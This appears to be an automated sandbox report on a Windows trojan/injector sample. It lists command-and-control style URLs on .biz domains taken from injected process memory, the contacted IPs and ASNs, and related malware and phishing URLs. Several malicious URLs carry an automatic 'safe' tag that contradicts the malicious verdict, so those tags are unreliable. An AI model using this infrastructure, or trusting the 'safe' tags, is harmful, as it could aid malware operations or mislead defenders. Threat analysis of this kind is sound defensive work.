                                                                                                                                                              http://isfusus-omoab.biz/d/N?02907F98B8907F98B8A27FB4B8907FBAE4849B522A907FAE96A251A18AA04FB6B8anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?0299396D2A99396D2AAB39412A99394F768DDDA7B899395B04AB175418A909432Aanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02DE1C0024DE1C0024EC1C2C24DE1C2278CAF8CAB6DE1C360AEC323916EE2C2E24anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?0218F0017918F001792AF02D7918F023250C14CBEB18F037572ADE384B28C02F79anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?020F7DFF370F7DFF373D7DD3370F7DDD6B1B9935A50F7DC9193D53C6053F4DD137anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://wns.windows.com/rexplorer.exe, 00000005.00000000.2329528909.000000000BE2A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://%s.biz/d/N?http://%s.biz/d/G?http://%s/d/rpt?%smodemisdn%u.%u.%u.%sYsyrcskNFK.exe, 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmp, anfidear.exe, 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02468495DF468495DF7484B9DF4684B78352605F4D4684A3F174AAACED76B4BBDFanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02C4108CE5C4108CE5F610A0E5C410AEB9D0F44677C410BACBF63EB5D7F420A2E5anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?02CD9A7119CD9A7119FF9A5D19CD9A5345D97EBB8BCD9A4737FFB4482BFDAA5F19anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?0235C7CA9F35C7CA9F07C7E69F35C7E8C32123000D35C7FCB107E9F3AD05F7E49Fanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02264C5283264C5283144C7E83264C70DF32A89811264C64AD14626BB1167C7C83anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02805AE06B805AE06BB25ACC6B805AC23794BE2AF9805AD645B274D959B06ACE6Banfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?0288D7D87388D7D873BAD7F47388D7FA2F9C3312E188D7EE5DBAF9E141B8E7F673anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.msn.com/en-us/news/politics/mitch-mcconnell-warns-house-republicans-about-hammerlock-of-explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?020385A7870385A78731858B87038585DB17616D15038591A931AB9EB533B58987anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02386863C1386863C10A684FC13868419D2C8CA953386855EF0A465AF308584DC1anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://%s.biz/d/N?YsyrcskNFK.exe, YsyrcskNFK.exe, 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmp, anfidear.exe, anfidear.exe, 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?0228C42DC328C42DC31AC401C328C40F9F3C20E75128C41BED1AEA14F118F403C3anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?029290CC2B9290CC2BA090E02B9290EE77867406B99290FA05A0BEF519A2A0E22Banfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?020C5067260C5067263E504B260C50457A18B4ADB40C5051083E7E5E143C604926anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?02501DD36E501DD36E621DFF6E501DF13244F919FC501DE5406233EA5C602DFD6Eanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02D0BDE735D0BDE735E2BDCB35D0BDC569C4592DA7D0BDD11BE293DE07E08DC935anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?02D0FF33C8D0FF33C8E2FF1FC8D0FF1194C41BF95AD0FF05E6E2D10AFAE0CF1DC8anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02B84E71A2B84E71A28A4E5DA2B84E53FEACAABB30B84E478C8A604890887E5FA2anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?028CE06A3B8CE06A3BBEE0463B8CE048679804A0A98CE05C15BECE5309BCD0443Banfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?028C1E3A398C1E3A39BE1E16398C1E186598FAF0AB8C1E0C17BE30030BBC2E1439anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02E45A11EAE45A11EAD65A3DEAE45A33B6F0BEDB78E45A27C4D67428D8D46A3FEAanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?029C20DE179C20DE17AE20F2179C20FC4B88C414859C20E839AE0EE725AC10F017anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000000.2326241159.0000000008680000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?02083C1BF1083C1BF13A3C37F1083C39AD1CD8D163083C2DDF3A1222C3380C35F1anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02B615D577B615D5778415F977B615F72BA2F11FE5B615E359843BEC458625FB77anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02F6C3C21AF6C3C21AC4C3EE1AF6C3E046E2270888F6C3F434C4EDFB28C6F3EC1Aanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?022C70E7482C70E7481E70CB482C70C51438942DDA2C70D1661E5EDE7A1C40C948anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?028CFCCC358CFCCC35BEFCE0358CFCEE69981806A78CFCFA1BBED2F507BCCCE235anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?0224F5EE5624F5EE5616F5C25624F5CC0A301124C424F5D87816DBD76414C5C056anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?025B00FDB05B00FDB06900D1B05B00DFEC4FE437225B00CB9E692EC4826B30D3B0anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02D04154BED04154BEE24178BED04176E2C4A59E2CD0416290E26F6D8CE0717ABEanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?0266915CED66915CED549170ED66917EB17275967F66916AC354BF65DF56A172EDanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://schemas.microexplorer.exe, 00000005.00000000.2325255321.0000000007620000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4776932594.00000000025E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2325269219.0000000007630000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=8B2A0224B153403AA00C6B7A3F8B99F4&timeOut=5000&ocexplorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02C42D6ED0C42D6ED0F62D42D0C42D4C8CD0C9A442C42D58FEF60357E2F41D40D0anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?024497CF864497CF867697E3864497EDDA507305144497F9A876B9F6B474A7E186anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?0298E6EA3A98E6EA3AAAE6C63A98E6C8668C0220A898E6DC14AAC8D308A8D6C43Aanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?02DF8866EBDF8866EBED884AEBDF8844B7CB6CAC79DF8850C5EDA65FD9EFB848EBanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?020C7846AF0C7846AF3E786AAF0C7864F3189C8C3D0C7870813E567F9D3C4868AFanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?025257D9F95257D9F96057F5F95257FBA546B3136B5257EFD76079E0CB6267F7F9anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              88.198.29.97
                                                                                                                                                              tjmgkenb.vgGermany
                                                                                                                                                              24940HETZNER-ASDEfalse
                                                                                                                                                              64.70.19.203
                                                                                                                                                              xwygeqmmxmx.wsUnited States
                                                                                                                                                              3561CENTURYLINK-LEGACY-SAVVISUSfalse
                                                                                                                                                              172.234.222.138
                                                                                                                                                              utbidet-ugeas.bizUnited States
                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                              45.79.222.138
                                                                                                                                                              vfugnlrfi.phUnited States
                                                                                                                                                              63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                              Analysis ID:1506040
                                                                                                                                                              Start date and time:2024-09-07 15:32:55 +02:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 8m 32s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:2
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:YsyrcskNFK.exe
                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                              Original Sample Name:Virus.Injector.ATA_virussign.com_48916c39188d7a1ecd7618b9622d925c.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.evad.winEXE@5/4@1154/4
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 15
                                                                                                                                                              • Number of non-executed functions: 33
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              09:33:50API Interceptor2023x Sleep call for process: explorer.exe modified
                                                                                                                                                              09:33:53API Interceptor24666x Sleep call for process: anfidear.exe modified
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              88.198.29.97Ey6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                p4C7Gm10K3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  KJEfMLiuRS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    64.70.19.203zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • blog.abconstructors.ws/wp-login.php
                                                                                                                                                                    gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • blog.acashmachine.ws/wp-login.php
                                                                                                                                                                    Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • blog.accu-personalservice.ws/wp-login.php
                                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                    • fedyanin.ws/admin.php
                                                                                                                                                                    BbbEtaIxAU.exeGet hashmaliciousBetabotBrowse
                                                                                                                                                                    • issasname.ws/xyz/abc/order.php?id=5889637
                                                                                                                                                                    GxELazkKkG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk
                                                                                                                                                                    Readme.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • ersaenrnwh.ws/imgs/krewa/nqxa.php?id=50f5gzcu&s5=3159&lip=192.168.2.5&win=Unk
                                                                                                                                                                    EAfIchN1gN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk
                                                                                                                                                                    144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • xircus.ws/kin/logout.php
                                                                                                                                                                    Br6Pmt0MiZ.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                    • thaus.ws/6
                                                                                                                                                                    172.234.222.138Payment Advice - Advice RefGLV626201911]Priority payment Customer_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • przvgke.biz/enaandj
                                                                                                                                                                    7Y18r(155).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • fwiwk.biz/whwaujbftg
                                                                                                                                                                    Aa4FIfA2bn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • przvgke.biz/hdybn
                                                                                                                                                                    WXKMSqpxCd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • fwiwk.biz/coqpmahjmholgu
                                                                                                                                                                    5Ldcb3pt1n.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • przvgke.biz/anq
                                                                                                                                                                    No context
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    CENTURYLINK-LEGACY-SAVVISUSEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 64.70.19.203
                                                                                                                                                                    mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 66.101.62.17
                                                                                                                                                                    x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 206.129.31.41
                                                                                                                                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 205.140.235.107
                                                                                                                                                                    154.213.187.80-x86-2024-09-01T00_09_56.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 207.2.162.149
                                                                                                                                                                    95.214.27.183-x86-2024-09-02T08_52_28.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 207.48.144.72
                                                                                                                                                                    mirai.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 208.128.187.123
                                                                                                                                                                    firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 64.242.160.135
                                                                                                                                                                    firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 206.156.198.186
                                                                                                                                                                    firmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 206.97.169.144
                                                                                                                                                                    LINODE-APLinodeLLCUShttps://gujgdne.themayfairgroupllc.site/?h9=KJj91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 172.105.14.134
                                                                                                                                                                    http://govedge.filegear-de.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 45.79.244.209
                                                                                                                                                                    http://therulecalm.comGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                    • 192.155.90.248
                                                                                                                                                                    https://rznfilarmonia.ru/bitrix/redirect.php?event1&event2&event3&goto=https://agroserviceica.com/rkos/distGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.239.27.53
                                                                                                                                                                    http://seoattal.hosted.phplist.com/lists/lt.php?tid=fU9RVwRXBQ1dUE9QVVcFSQQDVFEVAAUABBRSUFtRUwEAAAFaUVNNAl1XU1JRVlFJAgMEXhVWUlMDFAVXAAAfVQcEUFZWBABQXAJRHgUGB1EEUVJeFVBSAlMUUAELUB8FVlcFTlFQBQdUAFNWAVYGBwGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 45.33.29.14
                                                                                                                                                                    https://u1404228.ct.sendgrid.net/ls/click?upn=u001.53NsXfgUBOeYzK87Mt8UmmFmJrZ7XUeaM2H1JJzIOlLD8XdRMGUjLjiETSkkNSOO1aPcOhsB-2B6p58337PPTvLBJHf93ZwdhKuc0pYJ3CCFhPzGYkRFXax0jGvIeRFmcP5G0BUyJ6YhdCuxj2rmKfEA3sfYg2UNxl72w1Me3oPfdrF6jbhGk315PA9TABMIUQaw-2BWiKWUThNlxL-2FiIJdoH5tiTQT-2Bm8o6f2DtPJqJqYyOmKsC6Z8r8BDMH-2BRyR0DPAbc1o4jsJAeLDJ31LwWjsFQYr3zFK5cIf8Mbd-2BRzOeXFDSMm6es3Y0fepvpPG5r7pfagssMFSYnyu8MHsVv5hRcIKJqjAZyLx1ckeV-2FaCznPfw8naJb82iSt3TNueNL1vH7DevWmKVRPxk4wZ5wzTJXKbWW9anlXuh-2BQXFzp8R8-2BdEEizEjCv3UcDuHMQ1pDH865wy4DUZnYMpZjJQJPawcQswhgRnWgvPzhIRyQE-2Bc-3DkIeO_CR4Iv1KReyG-2BUTiHEM2iSrmxUTGCd7nll-2F8pyW4fRHUIiL68JldL5hjEvlqIxpWk9hPYxNH8eo9VRHfVERALBwpMyAhjDc4FUwScFs2ucRUabaJ73tdO-2FPebairfMf4xwZ2dpDlmkqO5pmgc1gE0gGghSpi3dDGJNhz4YymAGUOPzRzAYltzk0Ba7IAVZeXH7Jn8rume2KIoU57-2Fl62ae-2FaTXSu1TIVQ6Migf-2F6NGXqO6vztNaikiQe23mzDzfi19JJ-2FVN5j6ZPVhD34lLHzKpdiifzixAZur7VZCR5Hc24MfYQGTYVbJWBIhMdpT2lgG-2Bg-2FTIWWIZlY-2Fzm-2BK3i-2F0Q-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 139.162.185.155
                                                                                                                                                                    PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 45.33.6.223
                                                                                                                                                                    Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                    • 45.33.2.79
                                                                                                                                                                    firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 45.56.79.23
                                                                                                                                                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 178.79.128.206
                                                                                                                                                                    HETZNER-ASDEEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 88.198.29.97
                                                                                                                                                                    http://ayushmangupta01.github.io/Netflix_clone_mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 78.46.22.25
                                                                                                                                                                    http://www.jazeegroup.com/new_salary_increment_notification_secured_document.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 135.181.164.29
                                                                                                                                                                    Client.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                    • 195.201.57.90
                                                                                                                                                                    z3bqnf1WvW.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                    • 178.63.51.126
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                    • 5.75.214.132
                                                                                                                                                                    http://e95lq1vmgxojxrxkv7.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 195.201.57.90
